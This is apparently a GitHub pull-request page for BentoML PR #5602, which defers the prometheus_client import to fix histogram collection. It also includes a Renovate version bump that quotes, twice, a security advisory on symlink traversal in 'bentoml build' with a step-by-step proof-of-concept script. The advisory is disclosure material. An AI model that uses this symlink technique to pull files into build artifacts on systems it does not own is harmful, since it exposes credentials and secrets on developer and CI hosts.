Skip to content

fix: defer prometheus_client import in bentoml.metrics to fix histogram collection in multiprocess mode#5602

Merged
frostming merged 2 commits into
bentoml:mainfrom
ramkrishs:fix/metrics-multiprocess-histogram-collection
Apr 30, 2026
Merged

fix: defer prometheus_client import in bentoml.metrics to fix histogram collection in multiprocess mode#5602
frostming merged 2 commits into
bentoml:mainfrom
ramkrishs:fix/metrics-multiprocess-histogram-collection

Conversation

@ramkrishs
Copy link
Copy Markdown
Contributor

What does this PR address?

Fixes #5056 — when multiple Histogram objects are declared using bentoml.metrics, only the last one appears in the /metrics endpoint output.

Root cause

bentoml.metrics previously ran sys.modules[__name__] = prometheus_client at import time. This meant prometheus_client was imported the moment user service code wrote from bentoml.metrics import Histogram — which happens at service-module load time in the parent process, before any worker is forked.

Workers set PROMETHEUS_MULTIPROC_DIR in os.environ during startup. But since prometheus_client was already imported without this env var, it had initialised in single-process mode. Any Histogram or Counter objects created afterwards wrote to the in-process registry, not the file-backed multiprocess one. MultiProcessCollector — which BentoML's /metrics endpoint uses — reads from those files and therefore saw none of the user-defined metrics.

The "only last histogram collected" symptom was incidental: the collection path happened to surface one metric through a separate mechanism, masking the true scope of data loss.

Fix

Replace the eager sys.modules shim with a __getattr__ lazy loader in src/bentoml/metrics.py.

prometheus_client is now imported the first time an attribute is accessed (e.g. bentoml.metrics.Histogram), which happens after the worker has already set PROMETHEUS_MULTIPROC_DIR. The resolved attribute is cached in the module globals so subsequent accesses are free.

# Before (broken): prometheus_client imported at bentoml.metrics import time
sys.modules[__name__] = prometheus_client

# After (fixed): prometheus_client imported on first attribute access
def __getattr__(name: str) -> object:
    import prometheus_client  # deferred — after PROMETHEUS_MULTIPROC_DIR is set
    attr = getattr(prometheus_client, name)
    globals()[name] = attr  # cache for subsequent accesses
    return attr

Tests

Two new unit tests in tests/unit/test_metrics_deferred_import.py:

  • test_bentoml_metrics_does_not_import_prometheus_client_eagerly — asserts that import bentoml.metrics does not pull in prometheus_client.
  • test_multiple_histograms_all_collected_in_multiprocess_mode — full regression: creates three Histogram objects after setting PROMETHEUS_MULTIPROC_DIR, then verifies all three are visible to MultiProcessCollector. This is the exact scenario from the issue report.
PASSED tests/unit/test_metrics_deferred_import.py::test_bentoml_metrics_does_not_import_prometheus_client_eagerly
PASSED tests/unit/test_metrics_deferred_import.py::test_multiple_histograms_all_collected_in_multiprocess_mode

Notes

  • The DeprecationWarning from bentoml.metrics is preserved — it fires on first attribute access, which is the first point where user code actually interacts with the module.
  • Backward compatibility is maintained: all prometheus_client symbols are still accessible through bentoml.metrics.
  • This is a pure Python change with no dependency additions.

…am collection in multiprocess mode

Fixes bentoml#5056.

## Root cause

`bentoml.metrics` previously executed `sys.modules[__name__] = prometheus_client`
at import time, which caused `prometheus_client` to be imported immediately when
user service code did `from bentoml.metrics import Histogram`.

BentoML loads the service module in the parent process *before* forking workers.
Workers set `PROMETHEUS_MULTIPROC_DIR` in `os.environ` during startup, but by
that point `prometheus_client` had already been imported without the env var and
had initialised in single-process mode.  Any `Histogram` or `Counter` objects
created afterwards wrote to the in-process registry, not the file-backed
multiprocess one, so `MultiProcessCollector` (used by BentoML's `/metrics`
endpoint) saw nothing from them.

When multiple `Histogram` objects were declared, the symptom manifested as
"only the last declared histogram is collected" because the collection code
happened to pick up one metric through a different path, masking the full scope
of the data loss.

## Fix

Replace the eager `sys.modules` shim with a `__getattr__` lazy loader.
`prometheus_client` is now imported the first time an attribute (e.g.
`Histogram`) is accessed, which happens *after* the worker has already set
`PROMETHEUS_MULTIPROC_DIR`.  The resolved attribute is then cached in the
module globals so subsequent accesses skip `__getattr__` entirely.

## Tests

Two new unit tests in `tests/unit/test_metrics_deferred_import.py`:
- `test_bentoml_metrics_does_not_import_prometheus_client_eagerly`: asserts
  that importing `bentoml.metrics` does not pull in `prometheus_client`.
- `test_multiple_histograms_all_collected_in_multiprocess_mode`: full
  regression test confirming all three histograms from the issue report are
  visible to `MultiProcessCollector` after the worker sets the env var.
@ramkrishs ramkrishs requested a review from a team as a code owner April 28, 2026 22:21
@ramkrishs ramkrishs requested review from xianml and removed request for a team April 28, 2026 22:21
@frostming frostming merged commit 32230a5 into bentoml:main Apr 30, 2026
91 of 96 checks passed
renovate Bot added a commit to yxtay/agentic-recommenders that referenced this pull request May 7, 2026
This PR contains the following updates:

| Package | Type | Update | Change | OpenSSF |
|---|---|---|---|---|
| [bentoml](https://redirect.github.com/bentoml/bentoml) |
project.dependencies | patch | `1.4.38` → `1.4.39` | [![OpenSSF
Scorecard](https://api.securityscorecards.dev/projects/github.com/bentoml/bentoml/badge)](https://securityscorecards.dev/viewer/?uri=github.com/bentoml/bentoml)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/12) for more information.

---

### BentoML has Information Disclosure in `bentoml build` via symlink
traversal in the build context
[CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) /
[GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

<details>
<summary>More information</summary>

#### Details
##### Summary
BentoML's `bentoml build` packaging workflow follows attacker-controlled
symlinks inside the build context and copies the referenced file
contents into the generated Bento artifact.

If a victim builds an untrusted repository or other attacker-supplied
build context, the attacker can place a symlink such as `loot.txt ->
/tmp/outside-marker.txt` or a link to a more sensitive local file. When
`bentoml build` runs, BentoML dereferences the symlink and packages the
target file contents into the Bento. The leaked file can then propagate
further through export, push, or containerization workflows.

##### Details
The vulnerable code walks files under the build context and copies each
matched entry into the Bento source directory:

```python
for root, _, files in os.walk(ctx_path):
    for f in files:
        dir_path = os.path.relpath(root, ctx_path)
        path = os.path.join(dir_path, f).replace(os.sep, "/")
        if specs.includes(path):
            src_file = ctx_path.joinpath(path)
            dst_file = target_fs.joinpath(dest_path)
            shutil.copy(src_file, dst_file)
```

There is no validation that the resolved path of `src_file` remains
inside `ctx_path` before `shutil.copy` dereferences the source path. As
a result, a repository-controlled symlink can cross the trust boundary
from `attacker-controlled repository content` to `developer/CI host
filesystem` during the build process.

This is a build-time path traversal / symlink traversal issue in the
packaging feature, not a runtime API issue. The resulting Bento may
later be exported, pushed to remote storage, or converted into a
container image, which amplifies the leakage impact.

##### PoC
The issue was verified in WSL against BentoML 1.4.38. The following
script reproduces the vulnerability by using a harmless marker file
outside the build directory.

```bash
mkdir -p /tmp/bento-symlink-poc
cd /tmp/bento-symlink-poc

printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt

cat > service.py <<'EOF'
import bentoml

@&#8203;bentoml.service
class Demo:
    @&#8203;bentoml.api
    def ping(self, x: str) -> str:
        return x
EOF

cat > bentofile.yaml <<'EOF'
service: "service:Demo"
include:
  - "service.py"
  - "loot.txt"
EOF

ln -s /tmp/outside-marker.txt loot.txt

bentoml build --output tag
bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip

mkdir -p /tmp/poc-unzip
unzip -o /tmp/poc.zip -d /tmp/poc-unzip
find /tmp/poc-unzip -name loot.txt -print
cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \
find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \;
```

- The script creates `/tmp/outside-marker.txt` outside the build context
as a stand-in for a sensitive local file.
- It creates a minimal BentoML service and explicitly includes
`loot.txt` in `bentofile.yaml`.
- It creates `loot.txt` as a symlink to the external marker file.
<img width="1531" height="648" alt="image"
src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82"
/>

- It runs `bentoml build`, exports the generated Bento, unzips it, and
reads the packaged `src/loot.txt`.
- Successful exploitation is confirmed when the packaged file contains
`BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external
file contents rather than keeping only the symlink.
<img width="1315" height="121" alt="image"
src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e"
/>

<img width="1697" height="760" alt="image"
src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203"
/>

##### Impact
An attacker who can cause a developer, release engineer, or CI system to
run `bentoml build` on an attacker-controlled repository can exfiltrate
local files from the build host into the Bento artifact.

This can expose secrets such as cloud credentials, SSH keys, API tokens,
environment files, or other sensitive local configuration. Because Bento
artifacts are commonly exported, uploaded, stored, or containerized
after build, the leaked file contents can spread beyond the original
build machine.

#### Severity
- CVSS Score: 5.5 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
-
[https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv)
-
[https://github.com/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### BentoML has Information Disclosure in `bentoml build` via symlink
traversal in the build context
[CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) /
[GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

<details>
<summary>More information</summary>

#### Details
##### Summary
BentoML's `bentoml build` packaging workflow follows attacker-controlled
symlinks inside the build context and copies the referenced file
contents into the generated Bento artifact.

If a victim builds an untrusted repository or other attacker-supplied
build context, the attacker can place a symlink such as `loot.txt ->
/tmp/outside-marker.txt` or a link to a more sensitive local file. When
`bentoml build` runs, BentoML dereferences the symlink and packages the
target file contents into the Bento. The leaked file can then propagate
further through export, push, or containerization workflows.

##### Details
The vulnerable code walks files under the build context and copies each
matched entry into the Bento source directory:

```python
for root, _, files in os.walk(ctx_path):
    for f in files:
        dir_path = os.path.relpath(root, ctx_path)
        path = os.path.join(dir_path, f).replace(os.sep, "/")
        if specs.includes(path):
            src_file = ctx_path.joinpath(path)
            dst_file = target_fs.joinpath(dest_path)
            shutil.copy(src_file, dst_file)
```

There is no validation that the resolved path of `src_file` remains
inside `ctx_path` before `shutil.copy` dereferences the source path. As
a result, a repository-controlled symlink can cross the trust boundary
from `attacker-controlled repository content` to `developer/CI host
filesystem` during the build process.

This is a build-time path traversal / symlink traversal issue in the
packaging feature, not a runtime API issue. The resulting Bento may
later be exported, pushed to remote storage, or converted into a
container image, which amplifies the leakage impact.

##### PoC
The issue was verified in WSL against BentoML 1.4.38. The following
script reproduces the vulnerability by using a harmless marker file
outside the build directory.

```bash
mkdir -p /tmp/bento-symlink-poc
cd /tmp/bento-symlink-poc

printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt

cat > service.py <<'EOF'
import bentoml

@&#8203;bentoml.service
class Demo:
    @&#8203;bentoml.api
    def ping(self, x: str) -> str:
        return x
EOF

cat > bentofile.yaml <<'EOF'
service: "service:Demo"
include:
  - "service.py"
  - "loot.txt"
EOF

ln -s /tmp/outside-marker.txt loot.txt

bentoml build --output tag
bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip

mkdir -p /tmp/poc-unzip
unzip -o /tmp/poc.zip -d /tmp/poc-unzip
find /tmp/poc-unzip -name loot.txt -print
cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \
find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \;
```

- The script creates `/tmp/outside-marker.txt` outside the build context
as a stand-in for a sensitive local file.
- It creates a minimal BentoML service and explicitly includes
`loot.txt` in `bentofile.yaml`.
- It creates `loot.txt` as a symlink to the external marker file.
<img width="1531" height="648" alt="image"
src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82"
/>

- It runs `bentoml build`, exports the generated Bento, unzips it, and
reads the packaged `src/loot.txt`.
- Successful exploitation is confirmed when the packaged file contains
`BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external
file contents rather than keeping only the symlink.
<img width="1315" height="121" alt="image"
src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e"
/>

<img width="1697" height="760" alt="image"
src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203"
/>

##### Impact
An attacker who can cause a developer, release engineer, or CI system to
run `bentoml build` on an attacker-controlled repository can exfiltrate
local files from the build host into the Bento artifact.

This can expose secrets such as cloud credentials, SSH keys, API tokens,
environment files, or other sensitive local configuration. Because Bento
artifacts are commonly exported, uploaded, stored, or containerized
after build, the leaked file contents can spread beyond the original
build machine.

#### Severity
- CVSS Score: 5.5 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
-
[https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv)
-
[https://github.com/bentoml/BentoML](https://redirect.github.com/bentoml/BentoML)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-mcfx-4vc6-qgxv) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>bentoml/bentoml (bentoml)</summary>

###
[`v1.4.39`](https://redirect.github.com/bentoml/BentoML/releases/tag/v1.4.39)

[Compare
Source](https://redirect.github.com/bentoml/bentoml/compare/v1.4.38...v1.4.39)

##### What's Changed

- ci: pre-commit autoupdate \[skip ci] by
[@&#8203;pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[bentoml/BentoML#5593](https://redirect.github.com/bentoml/BentoML/pull/5593)
- fix: prevent following symlinks when copying files in BentoStore by
[@&#8203;frostming](https://redirect.github.com/frostming) in
[bentoml/BentoML#5598](https://redirect.github.com/bentoml/BentoML/pull/5598)
- fix: add sharing=locked to BuildKit cache mounts for multi-arch builds
by [@&#8203;lawrence3699](https://redirect.github.com/lawrence3699) in
[bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- fix: enhance Dockerfile generation by normalizing base image lines and
adding tests by
[@&#8203;frostming](https://redirect.github.com/frostming) in
[bentoml/BentoML#5603](https://redirect.github.com/bentoml/BentoML/pull/5603)
- fix: defer prometheus\_client import in bentoml.metrics to fix
histogram collection in multiprocess mode by
[@&#8203;ramkrishs](https://redirect.github.com/ramkrishs) in
[bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)
- ci: pre-commit autoupdate \[skip ci] by
[@&#8203;pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[bentoml/BentoML#5605](https://redirect.github.com/bentoml/BentoML/pull/5605)
- fix: handle string input in FileSchema by encoding to UTF-8 by
[@&#8203;frostming](https://redirect.github.com/frostming) in
[bentoml/BentoML#5606](https://redirect.github.com/bentoml/BentoML/pull/5606)

##### New Contributors

- [@&#8203;lawrence3699](https://redirect.github.com/lawrence3699) made
their first contribution in
[bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- [@&#8203;ramkrishs](https://redirect.github.com/ramkrishs) made their
first contribution in
[bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)

**Full Changelog**:
<bentoml/BentoML@v1.4.38...v1.4.39>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/yxtay/agentic-recommenders).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJzZWN1cml0eSJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

bug: Only the Last Declared Histogram is Collected When Using Multiple Histograms

2 participants